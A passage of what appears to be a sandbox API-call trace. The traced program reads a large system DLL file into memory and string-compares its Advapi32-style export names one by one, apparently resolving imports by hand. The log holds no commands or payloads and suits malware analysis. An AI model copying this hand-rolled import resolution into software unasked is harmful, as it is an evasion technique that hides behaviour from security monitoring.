lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0139.740] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=671472) returned 1 [0139.740] GetProcessHeap () returned 0x520000 [0139.740] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa3ef0) returned 0x2d62010 [0139.742] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0139.742] ReadFile (in: hFile=0x140, lpBuffer=0x2d62010, nNumberOfBytesToRead=0xa3ef0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d62010*, lpNumberOfBytesRead=0x14f5a4*=0xa3ef0, lpOverlapped=0x0) returned 1 [0140.090] CloseHandle (hObject=0x140) returned 1 [0140.090] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAFinal") returned 1 [0140.091] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAInit") returned 1 [0140.091] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAUpdate") returned 1 [0140.091] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="AbortSystemShutdownA") returned 0 [0140.091] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAFinal") returned 1 [0140.091] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAInit") returned 1 [0140.091] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAUpdate") returned 1 [0140.091] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownA") returned 1 [0140.091] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownW") returned 0 [0140.091] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAFinal") returned 1 [0140.091] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAInit") returned 1 [0140.091] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAUpdate") returned 1 [0140.091] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownA") returned 1 [0140.091] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownW") returned 1 [0140.091] lstrcmpA (lpString1="AccessCheck", lpString2="AccessCheck") returned 0 [0140.091] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0140.091] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0140.091] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0140.091] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0140.091] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0140.091] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0140.091] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 0 [0140.091] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0140.092] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0140.092] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0140.092] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0140.092] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0140.092] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0140.092] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0140.092] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 0 [0140.092] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAFinal") returned 1 [0140.092] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAInit") returned 1 [0140.092] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAUpdate") returned 1 [0140.092] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownA") returned 1 [0140.092] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownW") returned 1 [0140.092] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheck") returned 1 [0140.092] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0140.092] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0140.092] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckByType") returned 0 [0140.092] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0140.092] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0140.092] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0140.092] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0140.092] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0140.092] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0140.092] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0140.092] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0140.092] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0140.092] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 0 [0140.092] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0140.092] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0140.093] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0140.093] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0140.093] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0140.093] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0140.093] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0140.093] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0140.093] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0140.093] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0140.093] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 0 [0140.093] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAFinal") returned 1 [0140.093] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAInit") returned 1 [0140.093] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAUpdate") returned 1 [0140.093] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownA") returned 1 [0140.093] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownW") returned 1 [0140.093] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheck") returned 1 [0140.093] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0140.093] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0140.093] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByType") returned 1 [0140.093] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0140.093] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0140.093] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeResultList") returned 0 [0140.093] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0140.093] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0140.093] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0140.093] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0140.093] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0140.093] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0140.093] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0140.093] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0140.093] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0140.093] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0140.093] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0140.093] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultList") returned 1 [0140.094] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 0 [0140.094] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAFinal") returned 1 [0140.094] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAInit") returned 1 [0140.094] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAUpdate") returned 1 [0140.094] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownA") returned 1 [0140.094] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownW") returned 1 [0140.094] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheck") returned 1 [0140.094] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0140.094] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0140.094] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByType") returned 1 [0140.094] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0140.094] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0140.094] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultList") returned 1 [0140.094] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0140.094] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 0 [0140.094] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAFinal") returned 1 [0140.094] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAInit") returned 1 [0140.094] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAUpdate") returned 1 [0140.094] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownA") returned 1 [0140.094] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownW") returned 1 [0140.094] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheck") returned 1 [0140.094] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0140.094] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0140.094] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByType") returned 1 [0140.094] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0140.094] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0140.094] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultList") returned 1 [0140.094] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0140.094] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0140.094] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 0 [0140.094] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0140.094] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0140.094] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0140.094] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0140.095] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0140.095] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0140.095] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0140.095] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0140.095] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0140.095] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0140.095] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0140.095] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultList") returned 1 [0140.095] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0140.095] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0140.095] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0140.095] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 0 [0140.095] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAFinal") returned 1 [0140.095] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAInit") returned 1 [0140.095] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAUpdate") returned 1 [0140.095] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownA") returned 1 [0140.095] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownW") returned 1 [0140.095] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheck") returned 1 [0140.095] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0140.095] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0140.095] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByType") returned 1 [0140.095] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0140.095] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0140.095] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0140.095] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0140.095] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0140.095] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0140.095] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0140.095] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AddAccessAllowedAce") returned 0 [0140.095] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAFinal") returned 1 [0140.095] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAInit") returned 1 [0140.095] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAUpdate") returned 1 [0140.096] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0140.096] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0140.096] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheck") returned 1 [0140.096] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0140.096] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0140.096] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByType") returned 1 [0140.096] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0140.096] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0140.096] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0140.096] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0140.096] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0140.096] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0140.096] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0140.096] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0140.096] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAceEx") returned 0 [0140.096] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAFinal") returned 1 [0140.096] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAInit") returned 1 [0140.096] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAUpdate") returned 1 [0140.096] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0140.096] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0140.096] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheck") returned 1 [0140.096] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0140.096] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0140.096] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByType") returned 1 [0140.096] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0140.096] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0140.096] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0140.096] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0140.096] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0140.096] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0140.096] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0140.096] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0140.097] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0140.097] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 0 [0140.097] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAFinal") returned 1 [0140.097] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAInit") returned 1 [0140.097] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAUpdate") returned 1 [0140.097] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownA") returned 1 [0140.097] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownW") returned 1 [0140.097] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheck") returned 1 [0140.097] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0140.097] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0140.097] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByType") returned 1 [0140.097] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0140.097] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0140.097] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0140.097] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0140.097] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0140.097] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0140.097] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0140.097] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAce") returned 1 [0140.097] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAceEx") returned 1 [0140.097] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0140.097] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessDeniedAce") returned 0 [0140.097] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAFinal") returned 1 [0140.097] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAInit") returned 1 [0140.097] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAUpdate") returned 1 [0140.097] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0140.097] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0140.098] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheck") returned 1 [0140.098] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0140.098] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0140.098] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByType") returned 1 [0140.098] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0140.098] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0140.098] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0140.098] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0140.098] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0140.098] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0140.098] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0140.098] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0140.098] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAceEx") returned 1 [0140.098] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedObjectAce") returned 1 [0140.098] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAce") returned 1 [0140.098] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAceEx") returned 0 [0140.098] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAFinal") returned 1 [0140.098] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAInit") returned 1 [0140.098] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAUpdate") returned 1 [0140.098] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0140.098] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0140.099] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheck") returned 1 [0140.099] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0140.099] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0140.099] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByType") returned 1 [0140.099] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0140.099] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0140.099] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0140.099] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0140.099] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0140.099] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0140.099] lstrcmpA (lpString1="AddAccessDeniedObjectAce", 